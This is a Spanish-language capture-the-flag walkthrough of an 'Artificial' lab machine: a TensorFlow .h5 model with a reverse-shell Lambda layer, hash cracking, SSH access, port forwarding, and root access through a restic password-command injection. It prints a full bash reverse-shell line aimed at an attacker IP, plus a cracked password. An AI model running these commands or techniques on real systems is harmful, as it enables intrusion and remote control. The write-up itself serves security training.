cubeArtificial


Enumeración:


Entramos por el puerto 80 y nos registramos:


TensorFlow 2.13.1

  • Al descargar el requirements se vio lo siguiente:

Este script está escrito en Python 3 y utiliza TensorFlow para crear un modelo simple que contiene un payload de reverse shell. Cuando el archivo .h5 es cargado en el sistema, el modelo se ejecuta, activando la reverse shell.


Contenido del Dockerfile:

Construir la imagen Docker: Una vez creado el Dockerfile, ejecutaste el siguiente comando para construir la imagen:

Ejecutar el contenedor: Iniciaste el contenedor con el siguiente comando:


Crear y ejecutar el exploit:

  1. Script de Generación del Modelo Malicioso (generate_exploit.py): Creaste un script en Python que definía un modelo de TensorFlow con una capa Lambda que ejecutaba un comando malicioso (en este caso, el código para la reverse shell).

Generar el archivo exploit.h5: Dentro del contenedor, ejecutaste el script para generar el archivo exploit.h5 que contiene el modelo malicioso:

Copiar el archivo al host y cargarlo en la web:

Escuchar la conexión reversa con nc:


Compruebe que existe un user.dbarchivo de base de datos con una tabla de usuario

Intentamos crakear el hash de gael:


Otra forma:

Identificamos el tipo de hash

MD5


Entramos por ssh:


Subir privilegios:


Encontré pistas en /varel directorio y encontré el archivo de respaldo.

Solo tengo permiso de lectura, así que lo transferí a mi máquina local y encontré un hash de contraseña.

Entramos a ver los archivos:

Paso a paso: crackear passwordBcrypt del config.json

Vamos a decodificarlo con:

Continuar usando jhon:

lock-hashtagAlgoritmos Hashchevron-right

La encontró:

!@#$%^

Tenga en cuenta que el puerto de intranet 9898está abierto y reenvíelo.

Lo traemos a nuestra kali:


Entramos con esas credenciales:

Luego puedes crear un repo y ejecutar el comando

RESTIC_PASSWORD_COMMAND=bash -c 'bash -i >& /dev/tcp/10.10.16.77/5555 0>&1'


Last updated